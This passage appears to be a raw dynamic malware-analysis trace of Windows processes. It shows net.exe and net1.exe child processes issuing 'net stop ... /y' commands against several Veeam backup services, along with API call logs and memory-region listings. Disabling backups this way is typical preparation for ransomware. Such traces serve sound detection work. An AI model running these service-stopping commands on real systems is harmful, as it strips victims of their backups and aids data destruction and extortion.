returned 4 [0118.494] setlocale (category=0, locale=".437") returned="English_United States.437" [0118.502] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.502] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0118.502] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamCloudSvc /y" [0118.503] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f670, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0118.503] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0118.503] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16f8c8 | out: Buffer=0x16f8c8*=0x214d50) returned 0x0 [0118.503] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16f8c8 | out: Buffer=0x16f8c8*=0x21c100) returned 0x0 [0118.503] _fileno (_File=0x7fefdba2a80) returned 0 [0118.503] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0118.503] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0118.503] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0118.503] _wcsicmp (_String1="config", _String2="stop") returned -16 [0118.503] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0118.503] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0118.503] _wcsicmp (_String1="file", _String2="stop") returned -13 [0118.504] _wcsicmp (_String1="files", _String2="stop") returned -13 [0118.504] _wcsicmp (_String1="group", _String2="stop") returned -12 [0118.504] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0118.504] _wcsicmp (_String1="help", _String2="stop") returned -11 [0118.504] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0118.504] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0118.504] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0118.504] _wcsicmp (_String1="session", _String2="stop") returned -15 [0118.504] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0118.504] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0118.504] _wcsicmp (_String1="share", _String2="stop") returned -12 [0118.504] _wcsicmp (_String1="start", _String2="stop") returned -14 [0118.504] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0118.504] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0118.504] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0118.504] _wcsicmp (_String1="accounts", _String2="VeeamCloudSvc") returned -21 [0118.504] _wcsicmp (_String1="computer", _String2="VeeamCloudSvc") returned -19 [0118.504] _wcsicmp (_String1="config", _String2="VeeamCloudSvc") returned -19 [0118.504] _wcsicmp (_String1="continue", _String2="VeeamCloudSvc") returned -19 [0118.504] _wcsicmp (_String1="cont", _String2="VeeamCloudSvc") returned -19 [0118.504] _wcsicmp (_String1="file", _String2="VeeamCloudSvc") returned -16 [0118.504] _wcsicmp (_String1="files", _String2="VeeamCloudSvc") returned -16 [0118.504] _wcsicmp (_String1="group", _String2="VeeamCloudSvc") returned -15 [0118.504] _wcsicmp (_String1="groups", _String2="VeeamCloudSvc") returned -15 [0118.504] _wcsicmp (_String1="help", _String2="VeeamCloudSvc") returned -14 [0118.504] _wcsicmp (_String1="helpmsg", _String2="VeeamCloudSvc") returned -14 [0118.504] _wcsicmp (_String1="localgroup", _String2="VeeamCloudSvc") returned -10 [0118.504] _wcsicmp (_String1="pause", _String2="VeeamCloudSvc") returned -6 [0118.504] _wcsicmp (_String1="session", _String2="VeeamCloudSvc") returned -3 [0118.504] _wcsicmp (_String1="sessions", _String2="VeeamCloudSvc") returned -3 [0118.504] _wcsicmp (_String1="sess", _String2="VeeamCloudSvc") returned -3 [0118.504] _wcsicmp (_String1="share", _String2="VeeamCloudSvc") returned -3 [0118.504] _wcsicmp (_String1="start", _String2="VeeamCloudSvc") returned -3 [0118.504] _wcsicmp (_String1="stats", _String2="VeeamCloudSvc") returned -3 [0118.504] _wcsicmp (_String1="statistics", _String2="VeeamCloudSvc") returned -3 [0118.505] _wcsicmp (_String1="stop", _String2="VeeamCloudSvc") returned -3 [0118.505] _wcsicmp (_String1="time", _String2="VeeamCloudSvc") returned -2 [0118.505] _wcsicmp (_String1="user", _String2="VeeamCloudSvc") returned -1 [0118.505] _wcsicmp (_String1="users", _String2="VeeamCloudSvc") returned -1 [0118.505] _wcsicmp (_String1="msg", _String2="VeeamCloudSvc") returned -9 [0118.505] _wcsicmp (_String1="messenger", _String2="VeeamCloudSvc") returned -9 [0118.505] _wcsicmp (_String1="receiver", _String2="VeeamCloudSvc") returned -4 [0118.505] _wcsicmp (_String1="rcv", _String2="VeeamCloudSvc") returned -4 [0118.505] _wcsicmp (_String1="netpopup", _String2="VeeamCloudSvc") returned -8 [0118.505] _wcsicmp (_String1="redirector", _String2="VeeamCloudSvc") returned -4 [0118.505] _wcsicmp (_String1="redir", _String2="VeeamCloudSvc") returned -4 [0118.505] _wcsicmp (_String1="rdr", _String2="VeeamCloudSvc") returned -4 [0118.505] _wcsicmp (_String1="workstation", _String2="VeeamCloudSvc") returned 1 [0118.505] _wcsicmp (_String1="work", _String2="VeeamCloudSvc") returned 1 [0118.505] _wcsicmp (_String1="wksta", _String2="VeeamCloudSvc") returned 1 [0118.505] _wcsicmp (_String1="prdr", _String2="VeeamCloudSvc") returned -6 [0118.505] _wcsicmp (_String1="devrdr", _String2="VeeamCloudSvc") returned -18 [0118.505] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamCloudSvc") returned -10 [0118.505] _wcsicmp (_String1="server", _String2="VeeamCloudSvc") returned -3 [0118.505] _wcsicmp (_String1="svr", _String2="VeeamCloudSvc") returned -3 [0118.505] _wcsicmp (_String1="srv", _String2="VeeamCloudSvc") returned -3 [0118.505] _wcsicmp (_String1="lanmanserver", _String2="VeeamCloudSvc") returned -10 [0118.505] _wcsicmp (_String1="alerter", _String2="VeeamCloudSvc") returned -21 [0118.505] _wcsicmp (_String1="netlogon", _String2="VeeamCloudSvc") returned -8 [0118.505] _wcsupr (in: _String="VeeamCloudSvc" | out: _String="VEEAMCLOUDSVC") returned="VEEAMCLOUDSVC" [0118.506] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x21ce10 [0118.521] GetServiceKeyNameW (in: hSCManager=0x21ce10, lpDisplayName="VEEAMCLOUDSVC", lpServiceName=0xff955750, lpcchBuffer=0x16f7e8 | out: lpServiceName="", lpcchBuffer=0x16f7e8) returned 0 [0118.522] _wcsicmp (_String1="msg", _String2="VEEAMCLOUDSVC") returned -9 [0118.522] _wcsicmp (_String1="messenger", _String2="VEEAMCLOUDSVC") returned -9 [0118.522] _wcsicmp (_String1="receiver", _String2="VEEAMCLOUDSVC") returned -4 [0118.522] _wcsicmp (_String1="rcv", _String2="VEEAMCLOUDSVC") returned -4 [0118.522] _wcsicmp (_String1="redirector", _String2="VEEAMCLOUDSVC") returned -4 [0118.523] _wcsicmp (_String1="redir", _String2="VEEAMCLOUDSVC") returned -4 [0118.523] _wcsicmp (_String1="rdr", _String2="VEEAMCLOUDSVC") returned -4 [0118.523] _wcsicmp (_String1="workstation", _String2="VEEAMCLOUDSVC") returned 1 [0118.523] _wcsicmp (_String1="work", _String2="VEEAMCLOUDSVC") returned 1 [0118.523] _wcsicmp (_String1="wksta", _String2="VEEAMCLOUDSVC") returned 1 [0118.523] _wcsicmp (_String1="prdr", _String2="VEEAMCLOUDSVC") returned -6 [0118.523] _wcsicmp (_String1="devrdr", _String2="VEEAMCLOUDSVC") returned -18 [0118.523] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMCLOUDSVC") returned -10 [0118.523] _wcsicmp (_String1="server", _String2="VEEAMCLOUDSVC") returned -3 [0118.523] _wcsicmp (_String1="svr", _String2="VEEAMCLOUDSVC") returned -3 [0118.523] _wcsicmp (_String1="srv", _String2="VEEAMCLOUDSVC") returned -3 [0118.523] _wcsicmp (_String1="lanmanserver", _String2="VEEAMCLOUDSVC") returned -10 [0118.523] _wcsicmp (_String1="alerter", _String2="VEEAMCLOUDSVC") returned -21 [0118.523] _wcsicmp (_String1="netlogon", _String2="VEEAMCLOUDSVC") returned -8 [0118.523] NetServiceControl (in: servername=0x0, service="VEEAMCLOUDSVC", opcode=0x0, arg=0x0, bufptr=0x16f7f0 | out: bufptr=0x16f7f0) returned 0x889 [0118.524] wcscpy_s (in: _Destination=0xff9580d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0118.524] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0118.525] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff955b50, nSize=0x800, Arguments=0xff957f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0118.526] GetFileType (hFile=0xb) returned 0x2 [0118.526] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f6b8 | out: lpMode=0x16f6b8) returned 1 [0118.526] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff955b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x16f6b0, lpReserved=0x0 | out: lpBuffer=0xff955b50*, lpNumberOfCharsWritten=0x16f6b0*=0x1e) returned 1 [0118.527] GetFileType (hFile=0xb) returned 0x2 [0118.527] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f6b8 | out: lpMode=0x16f6b8) returned 1 [0118.527] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff931efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f6b0, lpReserved=0x0 | out: lpBuffer=0xff931efc*, lpNumberOfCharsWritten=0x16f6b0*=0x2) returned 1 [0118.527] _ultow (in: _Dest=0x889, _Radix=1505056 | out: _Dest=0x889) returned="2185" [0118.528] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff955b50, nSize=0x800, Arguments=0xff957f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0118.528] GetFileType (hFile=0xb) returned 0x2 [0118.528] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f6b8 | out: lpMode=0x16f6b8) returned 1 [0118.528] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff955b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x16f6b0, lpReserved=0x0 | out: lpBuffer=0xff955b50*, lpNumberOfCharsWritten=0x16f6b0*=0x34) returned 1 [0118.529] GetFileType (hFile=0xb) returned 0x2 [0118.529] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f6b8 | out: lpMode=0x16f6b8) returned 1 [0118.529] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff931efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f6b0, lpReserved=0x0 | out: lpBuffer=0xff931efc*, lpNumberOfCharsWritten=0x16f6b0*=0x2) returned 1 [0118.529] NetApiBufferFree (Buffer=0x214d50) returned 0x0 [0118.529] NetApiBufferFree (Buffer=0x21c100) returned 0x0 [0118.529] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamCloudSvc /y" [0118.529] exit (_Code=2) Process: id = "347" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x7a64c000" os_pid = "0x81c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamNFSSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12213 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12214 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12215 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12216 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 12217 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12218 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12219 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12220 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12221 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12222 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12223 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 12224 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12225 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12226 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12227 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 12228 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12229 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12230 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12231 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12473 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12474 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 12475 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 12476 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12477 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 12478 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 12479 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 12480 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12481 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12482 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12483 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12484 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12485 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12486 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12487 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12488 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 877 os_tid = 0xb00 Process: id = "348" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x505ac000" os_pid = "0xcd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "343" os_parent_pid = "0xd0c" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamMountSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12232 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12233 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12234 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12235 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12236 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12237 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12238 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12239 start_va = 0xff690000 end_va = 0xff6c2fff entry_point = 0xff690000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12240 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12241 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12242 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 12243 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12244 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12245 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12246 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 12247 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12248 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12249 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12250 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12329 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12330 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 12331 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12332 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12333 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12334 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12335 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12336 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12337 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12338 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12339 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12340 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12341 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12342 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12343 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12344 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12345 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12346 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12347 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12348 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 879 os_tid = 0x128c [0118.997] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa70 | out: lpSystemTimeAsFileTime=0x26fa70*(dwLowDateTime=0xfc12d850, dwHighDateTime=0x1d48689)) [0118.997] GetCurrentProcessId () returned 0xcd8 [0118.997] GetCurrentThreadId () returned 0x128c [0118.997] GetTickCount () returned 0x27695 [0118.997] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa78 | out: lpPerformanceCount=0x26fa78*=1816591600000) returned 1 [0118.998] GetModuleHandleW (lpModuleName=0x0) returned 0xff690000 [0118.998] __set_app_type (_Type=0x1) [0118.998] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff6a9c9c) returned 0x0 [0118.998] __getmainargs (in: _Argc=0xff6b4780, _Argv=0xff6b4790, _Env=0xff6b4788, _DoWildCard=0, _StartInfo=0xff6b479c | out: _Argc=0xff6b4780, _Argv=0xff6b4790, _Env=0xff6b4788) returned 0 [0118.998] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.999] GetConsoleOutputCP () returned 0x1b5 [0118.999] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff6bcec0 | out: lpCPInfo=0xff6bcec0) returned 1 [0118.999] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0119.000] sprintf_s (in: _DstBuf=0x26fa18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0119.001] setlocale (category=0, locale=".437") returned="English_United States.437" [0119.002] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0119.002] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0119.002] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamMountSvc /y" [0119.002] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f7b0, nSize=0x104 | 